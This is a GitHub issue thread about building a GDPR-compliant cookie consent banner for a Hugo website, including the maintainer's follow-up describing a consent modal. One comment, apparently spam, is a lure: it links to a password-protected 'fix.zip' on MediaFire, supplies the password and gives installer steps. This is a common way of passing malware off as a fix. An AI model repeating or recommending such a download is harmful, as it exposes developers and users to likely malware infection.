### ISSUE TITLE
Implement GDPR-compliant Cookie Consent Banner

### ISSUE THREAD

**Issue by 404missinglink** [takara-ai/Website#118]
**Is your feature request related to a problem? Please describe.**
To ensure GDPR compliance, we need to implement a cookie consent banner that allows users to opt-in to different types of cookies, including those used by Google Analytics.

**Describe the solution you'd like**
Implement a responsive cookie consent banner using Tailwind CSS with the following features:
1. Clear information about the use of cookies
2. Options for users to consent to different types of cookies (strictly necessary, performance, targeting)
3. Only load Google Analytics after explicit consent is given
4. Store user preferences and respect them on subsequent visits

**Describe alternatives you've considered**
Using a third-party cookie consent solution, but a custom implementation gives us more control over the design and functionality.

**Additional context**
- The banner should be implemented as a Hugo partial
- JavaScript functionality should be in a separate file
- The implementation should be integrated with our Google Analytics setup

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 404missinglink** [comment]
added a JS modal instead of a banner, I felt like this would encourage users to make a decision. The page is locked from moving otherwise.

All cookies for GTM are blocked from loading until consent is made, this is cached at a year. 

GTM is setup to receive new tags but privacy policy must be adjusted if the tags change for new tracking functionality.

![Screen Shot 2024-08-29 at 14 12 06](https://github.com/user-attachments/assets/7902a2a5-df23-45c9-a201-f1aa334901fe)
